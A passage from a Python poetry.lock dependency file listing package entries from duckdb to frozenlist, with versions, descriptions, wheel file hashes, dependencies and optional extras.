"duckdb-0.9.1-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:9c1d066fdae22b9b711b1603541651a378017645f9fbc4adc9764b2f3c9e9e4a"}, {file = "duckdb-0.9.1-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:1de56d8b7bd7a7653428c1bd4b8948316df488626d27e9c388194f2e0d1428d4"}, {file = "duckdb-0.9.1-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:1fb6cd590b1bb4e31fde8efd25fedfbfa19a86fa72789fa5b31a71da0d95bce4"}, {file = "duckdb-0.9.1-cp310-cp310-win32.whl", hash = "sha256:1039e073714d668cef9069bb02c2a6756c7969cedda0bff1332520c4462951c8"}, {file = "duckdb-0.9.1-cp310-cp310-win_amd64.whl", hash = "sha256:7e6ac4c28918e1d278a89ff26fd528882aa823868ed530df69d6c8a193ae4e41"}, {file = "duckdb-0.9.1-cp311-cp311-macosx_10_9_universal2.whl", hash = "sha256:5eb750f2ee44397a61343f32ee9d9e8c8b5d053fa27ba4185d0e31507157f130"}, {file = "duckdb-0.9.1-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:aea2a46881d75dc069a242cb164642d7a4f792889010fb98210953ab7ff48849"}, {file = "duckdb-0.9.1-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:ed3dcedfc7a9449b6d73f9a2715c730180056e0ba837123e7967be1cd3935081"}, {file = "duckdb-0.9.1-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:0c55397bed0087ec4445b96f8d55f924680f6d40fbaa7f2e35468c54367214a5"}, {file = "duckdb-0.9.1-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:3261696130f1cfb955735647c93297b4a6241753fb0de26c05d96d50986c6347"}, {file = "duckdb-0.9.1-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:64c04b1728e3e37cf93748829b5d1e028227deea75115bb5ead01c608ece44b1"}, {file = "duckdb-0.9.1-cp311-cp311-win32.whl", hash = "sha256:12cf9fb441a32702e31534330a7b4d569083d46a91bf185e0c9415000a978789"}, {file = "duckdb-0.9.1-cp311-cp311-win_amd64.whl", hash = "sha256:fdfd85575ce9540e593d5d25c9d32050bd636c27786afd7b776aae0f6432b55e"}, {file = "duckdb-0.9.1-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:704700a4b469e3bb1a7e85ac12e58037daaf2b555ef64a3fe2913ffef7bd585b"}, {file = "duckdb-0.9.1-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:cf55b303b7b1a8c2165a96e609eb30484bc47481d94a5fb1e23123e728df0a74"}, {file = "duckdb-0.9.1-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:b70e23c14746904ca5de316436e43a685eb769c67fe3dbfaacbd3cce996c5045"}, {file = "duckdb-0.9.1-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:77379f7f1f8b4dc98e01f8f6f8f15a0858cf456e2385e22507f3cb93348a88f9"}, {file = "duckdb-0.9.1-cp37-cp37m-win32.whl", hash = "sha256:92c8f738489838666cae9ef41703f8b16f660bb146970d1eba8b2c06cb3afa39"}, {file = "duckdb-0.9.1-cp37-cp37m-win_amd64.whl", hash = "sha256:08c5484ac06ab714f745526d791141f547e2f5ac92f97a0a1b37dfbb3ea1bd13"}, {file = "duckdb-0.9.1-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:f66d3c07c7f6938d3277294677eb7dad75165e7c57c8dd505503fc5ef10f67ad"}, {file = "duckdb-0.9.1-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:c38044e5f78c0c7b58e9f937dcc6c34de17e9ca6be42f9f8f1a5a239f7a847a5"}, {file = "duckdb-0.9.1-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:73bc0d715b79566b3ede00c367235cfcce67be0eddda06e17665c7a233d6854a"}, {file = "duckdb-0.9.1-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:d26622c3b4ea6a8328d95882059e3cc646cdc62d267d48d09e55988a3bba0165"}, {file = "duckdb-0.9.1-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:3367d10096ff2b7919cedddcf60d308d22d6e53e72ee2702f6e6ca03d361004a"}, {file = "duckdb-0.9.1-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:d88a119f1cb41911a22f08a6f084d061a8c864e28b9433435beb50a56b0d06bb"}, {file = "duckdb-0.9.1-cp38-cp38-win32.whl", hash = "sha256:99567496e45b55c67427133dc916013e8eb20a811fc7079213f5f03b2a4f5fc0"}, {file = "duckdb-0.9.1-cp38-cp38-win_amd64.whl", hash = "sha256:5b3da4da73422a3235c3500b3fb541ac546adb3e35642ef1119dbcd9cc7f68b8"}, {file = "duckdb-0.9.1-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:eca00c0c2062c0265c6c0e78ca2f6a30611b28f3afef062036610e9fc9d4a67d"}, {file = "duckdb-0.9.1-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:eb5af8e89d40fc4baab1515787ea1520a6c6cf6aa40ab9f107df6c3a75686ce1"}, {file = "duckdb-0.9.1-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:9fae3d4f83ebcb47995f6acad7c6d57d003a9b6f0e1b31f79a3edd6feb377443"}, {file = "duckdb-0.9.1-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:16b9a7efc745bc3c5d1018c3a2f58d9e6ce49c0446819a9600fdba5f78e54c47"}, {file = "duckdb-0.9.1-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:66b0b60167f5537772e9f5af940e69dcf50e66f5247732b8bb84a493a9af6055"}, {file = "duckdb-0.9.1-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:4f27f5e94c47df6c4ccddf18e3277b7464eea3db07356d2c4bf033b5c88359b8"}, {file = "duckdb-0.9.1-cp39-cp39-win32.whl", hash = "sha256:d43cd7e6f783006b59dcc5e40fcf157d21ee3d0c8dfced35278091209e9974d7"}, {file = "duckdb-0.9.1-cp39-cp39-win_amd64.whl", hash = "sha256:e666795887d9cf1d6b6f6cbb9d487270680e5ff6205ebc54b2308151f13b8cff"}, {file = "duckdb-0.9.1.tar.gz", hash = "sha256:603a878746015a3f2363a65eb48bcbec816261b6ee8d71eee53061117f6eef9d"}, ] [[package]] name = "duckdb-engine" version = "0.9.2" description = "SQLAlchemy driver for duckdb" optional = false python-versions = ">=3.7" files = [ {file = "duckdb_engine-0.9.2-py3-none-any.whl", hash = "sha256:764e83dfb37e2f0ce6afcb8e701299e7b28060a40fdae86cfd7f08e0fca4496a"}, {file = "duckdb_engine-0.9.2.tar.gz", hash = "sha256:efcd7b468f9b17e4480a97f0c60eade25cc081e8cfc04c46d63828677964b48f"}, ] [package.dependencies] duckdb = ">=0.4.0" sqlalchemy = ">=1.3.22" [[package]] name = "duckduckgo-search" version = "3.9.3" description = "Search for words, documents, images, news, maps and text translation using the DuckDuckGo.com search engine." optional = true python-versions = ">=3.8" files = [ {file = "duckduckgo_search-3.9.3-py3-none-any.whl", hash = "sha256:4b462333378e9f78e138eccd73a315a54cb5208ebb07ab4ec179d9d18b2998b5"}, {file = "duckduckgo_search-3.9.3.tar.gz", hash = "sha256:f68aca605827df4e6b5b4ab00f9a891e103ec30809de092af42e885a617ab5ba"}, ] [package.dependencies] aiofiles = ">=23.2.1" click = ">=8.1.7" httpx = {version = ">=0.25.0", extras = ["brotli", "http2", "socks"]} lxml = ">=4.9.3" [package.extras] dev = ["black (>=23.9.1)", "isort (>=5.12.0)", "pytest (>=7.4.2)", "pytest-asyncio (>=0.21.1)", "ruff (>=0.0.291)"] [[package]] name = "elastic-transport" version = "8.4.1" description = "Transport classes and utilities shared among Python Elastic client libraries" optional = true python-versions = ">=3.6" files = [ {file = "elastic-transport-8.4.1.tar.gz", hash = "sha256:e5548997113c5d9566c9a1a51ed67bce50a4871bc0e44b692166461279e4167e"}, {file = "elastic_transport-8.4.1-py3-none-any.whl", hash = "sha256:c718ce40e8217b6045604961463c10da69a152dda07af4e25b3feae8d7965fc0"}, ] [package.dependencies] certifi = "*" urllib3 = ">=1.26.2,<2" [package.extras] develop = ["aiohttp", "furo", "mock", "pytest", "pytest-asyncio", "pytest-cov", "pytest-httpserver", "pytest-mock", "requests", "sphinx (>2)", "sphinx-autodoc-typehints", "trustme"] [[package]] name = "elasticsearch" version = "8.10.1" description = "Python client for Elasticsearch" optional = true python-versions = ">=3.6, <4" files = [ {file = "elasticsearch-8.10.1-py3-none-any.whl", hash = "sha256:68141d42d10c7f67ac466ca00496830d3b81a7e9476c3baa5585060832c60c69"}, {file = "elasticsearch-8.10.1.tar.gz", hash = "sha256:2cb56b433daa2d3ef1aaa2e5a5eacd36ba1d66884722f3d7759a4f9d16190059"}, ] [package.dependencies] elastic-transport = ">=8,<9" [package.extras] async = ["aiohttp (>=3,<4)"] requests = ["requests (>=2.4.0,<3.0.0)"] [[package]] name = "entrypoints" version = "0.4" description = "Discover and load entry points from installed packages." optional = true python-versions = ">=3.6" files = [ {file = "entrypoints-0.4-py3-none-any.whl", hash = "sha256:f174b5ff827504fd3cd97cc3f8649f3693f51538c7e4bdf3ef002c8429d42f9f"}, {file = "entrypoints-0.4.tar.gz", hash = "sha256:b706eddaa9218a19ebcd67b56818f05bb27589b1ca9e8d797b74affad4ccacd4"}, ] [[package]] name = "esprima" version = "4.0.1" description = "ECMAScript parsing infrastructure for multipurpose analysis in Python" optional = true python-versions = "*" files = [ {file = "esprima-4.0.1.tar.gz", hash = "sha256:08db1a876d3c2910db9cfaeb83108193af5411fc3a3a66ebefacd390d21323ee"}, ] [[package]] name = "exceptiongroup" version = "1.1.3" description = "Backport of PEP 654 (exception groups)" optional = false python-versions = ">=3.7" files = [ {file = "exceptiongroup-1.1.3-py3-none-any.whl", hash = "sha256:343280667a4585d195ca1cf9cef84a4e178c4b6cf2274caef9859782b567d5e3"}, {file = "exceptiongroup-1.1.3.tar.gz", hash = "sha256:097acd85d473d75af5bb98e41b61ff7fe35efe6675e4f9370ec6ec5126d160e9"}, ] [package.extras] test = ["pytest (>=6)"] [[package]] name = "executing" version = "2.0.0" description = "Get the currently executing AST node of a frame, and other information" optional = false python-versions = "*" files = [ {file = "executing-2.0.0-py2.py3-none-any.whl", hash = "sha256:06df6183df67389625f4e763921c6cf978944721abf3e714000200aab95b0657"}, {file = "executing-2.0.0.tar.gz", hash = "sha256:0ff053696fdeef426cda5bd18eacd94f82c91f49823a2e9090124212ceea9b08"}, ] [package.extras] tests = ["asttokens (>=2.1.0)", "coverage", "coverage-enable-subprocess", "ipython", "littleutils", "pytest", "rich"] [[package]] name = "faiss-cpu" version = "1.7.4" description = "A library for efficient similarity search and clustering of dense vectors." optional = true python-versions = "*" files = [ {file = "faiss-cpu-1.7.4.tar.gz", hash = "sha256:265dc31b0c079bf4433303bf6010f73922490adff9188b915e2d3f5e9c82dd0a"}, {file = "faiss_cpu-1.7.4-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:50d4ebe7f1869483751c558558504f818980292a9b55be36f9a1ee1009d9a686"}, {file = "faiss_cpu-1.7.4-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:7b1db7fae7bd8312aeedd0c41536bcd19a6e297229e1dce526bde3a73ab8c0b5"}, {file = "faiss_cpu-1.7.4-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:17b7fa7194a228a84929d9e6619d0e7dbf00cc0f717e3462253766f5e3d07de8"}, {file = "faiss_cpu-1.7.4-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:dca531952a2e3eac56f479ff22951af4715ee44788a3fe991d208d766d3f95f3"}, {file = "faiss_cpu-1.7.4-cp310-cp310-win_amd64.whl", hash = "sha256:7173081d605e74766f950f2e3d6568a6f00c53f32fd9318063e96728c6c62821"}, {file = "faiss_cpu-1.7.4-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:d0bbd6f55d7940cc0692f79e32a58c66106c3c950cee2341b05722de9da23ea3"}, {file = "faiss_cpu-1.7.4-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:e13c14280376100f143767d0efe47dcb32618f69e62bbd3ea5cd38c2e1755926"}, {file = "faiss_cpu-1.7.4-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:c521cb8462f3b00c0c7dfb11caff492bb67816528b947be28a3b76373952c41d"}, {file = "faiss_cpu-1.7.4-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:afdd9fe1141117fed85961fd36ee627c83fc3b9fd47bafb52d3c849cc2f088b7"}, {file = "faiss_cpu-1.7.4-cp311-cp311-win_amd64.whl", hash = "sha256:2ff7f57889ea31d945e3b87275be3cad5d55b6261a4e3f51c7aba304d76b81fb"}, {file = "faiss_cpu-1.7.4-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:eeaf92f27d76249fb53c1adafe617b0f217ab65837acf7b4ec818511caf6e3d8"}, {file = "faiss_cpu-1.7.4-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:102b1bd763e9b0c281ac312590af3eaf1c8b663ccbc1145821fe6a9f92b8eaaf"}, {file = "faiss_cpu-1.7.4-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:5512da6707c967310c46ff712b00418b7ae28e93cb609726136e826e9f2f14fa"}, {file = "faiss_cpu-1.7.4-cp37-cp37m-win_amd64.whl", hash = "sha256:0c2e5b9d8c28c99f990e87379d5bbcc6c914da91ebb4250166864fd12db5755b"}, {file = "faiss_cpu-1.7.4-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:43f67f325393145d360171cd98786fcea6120ce50397319afd3bb78be409fb8a"}, {file = "faiss_cpu-1.7.4-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:6a4e4af194b8fce74c4b770cad67ad1dd1b4673677fc169723e4c50ba5bd97a8"}, {file = "faiss_cpu-1.7.4-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:31bfb7b9cffc36897ae02a983e04c09fe3b8c053110a287134751a115334a1df"}, {file = "faiss_cpu-1.7.4-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:52d7de96abef2340c0d373c1f5cbc78026a3cebb0f8f3a5920920a00210ead1f"}, {file = "faiss_cpu-1.7.4-cp38-cp38-win_amd64.whl", hash = "sha256:699feef85b23c2c729d794e26ca69bebc0bee920d676028c06fd0e0becc15c7e"}, {file = "faiss_cpu-1.7.4-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:559a0133f5ed44422acb09ee1ac0acffd90c6666d1bc0d671c18f6e93ad603e2"}, {file = "faiss_cpu-1.7.4-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:ea1d71539fe3dc0f1bed41ef954ca701678776f231046bf0ca22ccea5cf5bef6"}, {file = "faiss_cpu-1.7.4-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:12d45e0157024eb3249842163162983a1ac8b458f1a8b17bbf86f01be4585a99"}, {file = "faiss_cpu-1.7.4-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:2f0eab359e066d32c874f51a7d4bf6440edeec068b7fe47e6d803c73605a8b4c"}, {file = "faiss_cpu-1.7.4-cp39-cp39-win_amd64.whl", hash = "sha256:98459ceeeb735b9df1a5b94572106ffe0a6ce740eb7e4626715dd218657bb4dc"}, ] [[package]] name = "fastavro" version = "1.8.2" description = "Fast read/write of AVRO files" optional = true python-versions = ">=3.8" files = [ {file = "fastavro-1.8.2-cp310-cp310-macosx_11_0_x86_64.whl", hash = "sha256:0e08964b2e9a455d831f2557402a683d4c4d45206f2ab9ade7c69d3dc14e0e58"}, {file = "fastavro-1.8.2-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:401a70b1e5c7161420c6019e0c8afa88f7c8a373468591f5ec37639a903c2509"}, {file = "fastavro-1.8.2-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:eef1ed3eaa4240c05698d02d8d0c010b9a03780eda37b492da6cd4c9d37e04ec"}, {file = "fastavro-1.8.2-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:543185a672ff6306beb329b57a7b8a3a2dd1eb21a5ccc530150623d58d48bb98"}, {file = "fastavro-1.8.2-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:ffbf8bae1edb50fe7beeffc3afa8e684686550c2e5d31bf01c25cfa213f581e1"}, {file = "fastavro-1.8.2-cp310-cp310-win_amd64.whl", hash = "sha256:bb545eb9d876bc7b785e27e98e7720ada7eee7d7a1729798d2ed51517f13500a"}, {file = "fastavro-1.8.2-cp311-cp311-macosx_10_9_universal2.whl", hash = "sha256:2b837d3038c651046252bc92c1b9899bf21c7927a148a1ff89599c36c2a331ca"}, {file = "fastavro-1.8.2-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:d3510e96c0a47e4e914bd1a29c954eb662bfa24849ad92e597cb97cc79f21af7"}, {file = "fastavro-1.8.2-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:ccc0e74f2c2ab357f39bb73d67fcdb6dc10e23fdbbd399326139f72ec0fb99a3"}, {file = "fastavro-1.8.2-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:add51c70d0ab1175601c75cd687bbe9d16ae312cd8899b907aafe0d79ee2bc1d"}, {file = "fastavro-1.8.2-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:d9e2662f57e6453e9a2c9fb4f54b2a9e62e3e46f5a412ac00558112336d23883"}, {file = "fastavro-1.8.2-cp311-cp311-win_amd64.whl", hash = "sha256:fea75cf53a93c56dd56e68abce8d314ef877b27451c870cd7ede7582d34c08a7"}, {file = "fastavro-1.8.2-cp38-cp38-macosx_11_0_x86_64.whl", hash = "sha256:f489020bb8664c2737c03457ad5dbd490579ddab6f0a7b5c17fecfe982715a89"}, {file = "fastavro-1.8.2-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:a547625c138efd5e61300119241041906ee8cb426fc7aa789900f87af7ed330d"}, {file = "fastavro-1.8.2-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:53beb458f30c9ad4aa7bff4a42243ff990ffb713b6ce0cd9b360cbc3d648fe52"}, {file = "fastavro-1.8.2-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:7b1b2cbd2dd851452306beed0ab9bdaeeab1cc8ad46f84b47cd81eeaff6dd6b8"}, {file = "fastavro-1.8.2-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:d29e9baee0b2f37ecd09bde3b487cf900431fd548c85be3e4fe1b9a0b2a917f1"}, {file = "fastavro-1.8.2-cp38-cp38-win_amd64.whl", hash = "sha256:66e132c710663230292bc63e2cb79cf95b16ccb94a5fc99bb63694b24e312fc5"}, {file = "fastavro-1.8.2-cp39-cp39-macosx_11_0_x86_64.whl", hash = "sha256:38aca63ce604039bcdf2edd14912d00287bdbf8b76f9aa42b28e6ca0bf950092"}, {file = "fastavro-1.8.2-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:9787835f6449ee94713e7993a700432fce3763024791ffa8a58dc91ef9d1f950"}, {file = "fastavro-1.8.2-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:536cb448bc83811056be02749fd9df37a69621678f02597d272970a769e9b40c"}, {file = "fastavro-1.8.2-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:e9d5027cf7d9968f8f819958b41bfedb933323ea6d6a0485eefacaa1afd91f54"}, {file = "fastavro-1.8.2-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:792adfc0c80c7f1109e0ab4b0decef20691fdf0a45091d397a0563872eb56d42"}, {file = "fastavro-1.8.2-cp39-cp39-win_amd64.whl", hash = "sha256:650b22766259f7dd7519dfa4e4658f0e233c319efa130b9cf0c36a500e09cc57"}, {file = "fastavro-1.8.2.tar.gz", hash = "sha256:ab9d9226d4b66b6b3d0661a57cd45259b0868fed1c0cd4fac95249b9e0973320"}, ] [package.extras] codecs = ["lz4", "python-snappy", "zstandard"] lz4 = ["lz4"] snappy = ["python-snappy"] zstandard = ["zstandard"] [[package]] name = "fastjsonschema" version = "2.18.1" description = "Fastest Python implementation of JSON schema" optional = false python-versions = "*" files = [ {file = "fastjsonschema-2.18.1-py3-none-any.whl", hash = "sha256:aec6a19e9f66e9810ab371cc913ad5f4e9e479b63a7072a2cd060a9369e329a8"}, {file = "fastjsonschema-2.18.1.tar.gz", hash = "sha256:06dc8680d937628e993fa0cd278f196d20449a1adc087640710846b324d422ea"}, ] [package.extras] devel = ["colorama", "json-spec", "jsonschema", "pylint", "pytest", "pytest-benchmark", "pytest-cache", "validictory"] [[package]] name = "feedfinder2" version = "0.0.4" description = "Find the feed URLs for a website." optional = true python-versions = "*" files = [ {file = "feedfinder2-0.0.4.tar.gz", hash = "sha256:3701ee01a6c85f8b865a049c30ba0b4608858c803fe8e30d1d289fdbe89d0efe"}, ] [package.dependencies] beautifulsoup4 = "*" requests = "*" six = "*" [[package]] name = "feedparser" version = "6.0.10" description = "Universal feed parser, handles RSS 0.9x, RSS 1.0, RSS 2.0, CDF, Atom 0.3, and Atom 1.0 feeds" optional = true python-versions = ">=3.6" files = [ {file = "feedparser-6.0.10-py3-none-any.whl", hash = "sha256:79c257d526d13b944e965f6095700587f27388e50ea16fd245babe4dfae7024f"}, {file = "feedparser-6.0.10.tar.gz", hash = "sha256:27da485f4637ce7163cdeab13a80312b93b7d0c1b775bef4a47629a3110bca51"}, ] [package.dependencies] sgmllib3k = "*" [[package]] name = "filelock" version = "3.13.0" description = "A platform independent file lock." optional = true python-versions = ">=3.8" files = [ {file = "filelock-3.13.0-py3-none-any.whl", hash = "sha256:a552f4fde758f4eab33191e9548f671970f8b06d436d31388c9aa1e5861a710f"}, {file = "filelock-3.13.0.tar.gz", hash = "sha256:63c6052c82a1a24c873a549fbd39a26982e8f35a3016da231ead11a5be9dad44"}, ] [package.extras] docs = ["furo (>=2023.9.10)", "sphinx (>=7.2.6)", "sphinx-autodoc-typehints (>=1.24)"] testing = ["covdefaults (>=2.3)", "coverage (>=7.3.2)", "diff-cover (>=8)", "pytest (>=7.4.3)", "pytest-cov (>=4.1)", "pytest-mock (>=3.12)", "pytest-timeout (>=2.2)"] typing = ["typing-extensions (>=4.8)"] [[package]] name = "fiona" version = "1.9.5" description = "Fiona reads and writes spatial data files" optional = true python-versions = ">=3.7" files = [ {file = "fiona-1.9.5-cp310-cp310-macosx_10_15_x86_64.whl", hash = "sha256:5f40a40529ecfca5294260316cf987a0420c77a2f0cf0849f529d1afbccd093e"}, {file = "fiona-1.9.5-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:374efe749143ecb5cfdd79b585d83917d2bf8ecfbfc6953c819586b336ce9c63"}, {file = "fiona-1.9.5-cp310-cp310-manylinux2014_x86_64.whl", hash = "sha256:35dae4b0308eb44617cdc4461ceb91f891d944fdebbcba5479efe524ec5db8de"}, {file = "fiona-1.9.5-cp310-cp310-win_amd64.whl", hash = "sha256:5b4c6a3df53bee8f85bb46685562b21b43346be1fe96419f18f70fa1ab8c561c"}, {file = "fiona-1.9.5-cp311-cp311-macosx_10_15_x86_64.whl", hash = "sha256:6ad04c1877b9fd742871b11965606c6a52f40706f56a48d66a87cc3073943828"}, {file = "fiona-1.9.5-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:9fb9a24a8046c724787719e20557141b33049466145fc3e665764ac7caf5748c"}, {file = "fiona-1.9.5-cp311-cp311-manylinux2014_x86_64.whl", hash = "sha256:d722d7f01a66f4ab6cd08d156df3fdb92f0669cf5f8708ddcb209352f416f241"}, {file = "fiona-1.9.5-cp311-cp311-win_amd64.whl", hash = "sha256:7ede8ddc798f3d447536080c6db9a5fb73733ad8bdb190cb65eed4e289dd4c50"}, {file = "fiona-1.9.5-cp312-cp312-macosx_10_15_x86_64.whl", hash = "sha256:8b098054a27c12afac4f819f98cb4d4bf2db9853f70b0c588d7d97d26e128c39"}, {file = "fiona-1.9.5-cp312-cp312-macosx_11_0_arm64.whl", hash = "sha256:6d9f29e9bcbb33232ff7fa98b4a3c2234db910c1dc6c4147fc36c0b8b930f2e0"}, {file = "fiona-1.9.5-cp312-cp312-manylinux2014_x86_64.whl", hash = "sha256:f1af08da4ecea5036cb81c9131946be4404245d1b434b5b24fd3871a1d4030d9"}, {file = "fiona-1.9.5-cp312-cp312-win_amd64.whl", hash = "sha256:c521e1135c78dec0d7774303e5a1b4c62e0efb0e602bb8f167550ef95e0a2691"}, {file = "fiona-1.9.5-cp37-cp37m-macosx_10_15_x86_64.whl", hash = "sha256:fce4b1dd98810cabccdaa1828430c7402d283295c2ae31bea4f34188ea9e88d7"}, {file = "fiona-1.9.5-cp37-cp37m-manylinux2014_x86_64.whl", hash = "sha256:3ea04ec2d8c57b5f81a31200fb352cb3242aa106fc3e328963f30ffbdf0ff7c8"}, {file = "fiona-1.9.5-cp37-cp37m-win_amd64.whl", hash = "sha256:4877cc745d9e82b12b3eafce3719db75759c27bd8a695521202135b36b58c2e7"}, {file = "fiona-1.9.5-cp38-cp38-macosx_10_15_x86_64.whl", hash = "sha256:ac2c250f509ec19fad7959d75b531984776517ef3c1222d1cc5b4f962825880b"}, {file = "fiona-1.9.5-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:4df21906235928faad856c288cfea0298e9647f09c9a69a230535cbc8eadfa21"}, {file = "fiona-1.9.5-cp38-cp38-manylinux2014_x86_64.whl", hash = "sha256:81d502369493687746cb8d3cd77e5ada4447fb71d513721c9a1826e4fb32b23a"}, {file = "fiona-1.9.5-cp38-cp38-win_amd64.whl", hash = "sha256:ce3b29230ef70947ead4e701f3f82be81082b7f37fd4899009b1445cc8fc276a"}, {file = "fiona-1.9.5-cp39-cp39-macosx_10_15_x86_64.whl", hash = "sha256:8b53ce8de773fcd5e2e102e833c8c58479edd8796a522f3d83ef9e08b62bfeea"}, {file = "fiona-1.9.5-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:bd2355e859a1cd24a3e485c6dc5003129f27a2051629def70036535ffa7e16a4"}, {file = "fiona-1.9.5-cp39-cp39-manylinux2014_x86_64.whl", hash = "sha256:9a2da52f865db1aff0eaf41cdd4c87a7c079b3996514e8e7a1ca38457309e825"}, {file = "fiona-1.9.5-cp39-cp39-win_amd64.whl", hash = "sha256:cfef6db5b779d463298b1113b50daa6c5b55f26f834dc9e37752116fa17277c1"}, {file = "fiona-1.9.5.tar.gz", hash = "sha256:99e2604332caa7692855c2ae6ed91e1fffdf9b59449aa8032dd18e070e59a2f7"}, ] [package.dependencies] attrs = ">=19.2.0" certifi = "*" click = ">=8.0,<9.0" click-plugins = ">=1.0" cligj = ">=0.5" importlib-metadata = {version = "*", markers = "python_version < \"3.10\""} setuptools = "*" six = "*" [package.extras] all = ["Fiona[calc,s3,test]"] calc = ["shapely"] s3 = ["boto3 (>=1.3.1)"] test = ["Fiona[s3]", "pytest (>=7)", "pytest-cov", "pytz"] [[package]] name = "flatbuffers" version = "23.5.26" description = "The FlatBuffers serialization format for Python" optional = true python-versions = "*" files = [ {file = "flatbuffers-23.5.26-py2.py3-none-any.whl", hash = "sha256:c0ff356da363087b915fde4b8b45bdda73432fc17cddb3c8157472eab1422ad1"}, {file = "flatbuffers-23.5.26.tar.gz", hash = "sha256:9ea1144cac05ce5d86e2859f431c6cd5e66cd9c78c558317c7955fb8d4c78d89"}, ] [[package]] name = "fqdn" version = "1.5.1" description = "Validates fully-qualified domain names against RFC 1123, so that they are acceptable to modern bowsers" optional = false python-versions = ">=2.7, !=3.0, !=3.1, !=3.2, !=3.3, !=3.4, <4" files = [ {file = "fqdn-1.5.1-py3-none-any.whl", hash = "sha256:3a179af3761e4df6eb2e026ff9e1a3033d3587bf980a0b1b2e1e5d08d7358014"}, {file = "fqdn-1.5.1.tar.gz", hash = "sha256:105ed3677e767fb5ca086a0c1f4bb66ebc3c100be518f0e0d755d9eae164d89f"}, ] [[package]] name = "freezegun" version = "1.2.2" description = "Let your Python tests travel through time" optional = false python-versions = ">=3.6" files = [ {file = "freezegun-1.2.2-py3-none-any.whl", hash = "sha256:ea1b963b993cb9ea195adbd893a48d573fda951b0da64f60883d7e988b606c9f"}, {file = "freezegun-1.2.2.tar.gz", hash = "sha256:cd22d1ba06941384410cd967d8a99d5ae2442f57dfafeff2fda5de8dc5c05446"}, ] [package.dependencies] python-dateutil = ">=2.7" [[package]] name = "frozenlist" version = "1.4.0" description = "A list-like structure which implements collections.abc.MutableSequence" optional = false python-versions = ">=3.8" files = [ {file = "frozenlist-1.4.0-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:764226ceef3125e53ea2cb275000e309c0aa5464d43bd72abd661e27fffc26ab"}, {file = "frozenlist-1.4.0-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:d6484756b12f40003c6128bfcc3fa9f0d49a687e171186c2d85ec82e3758c559"}, {file = 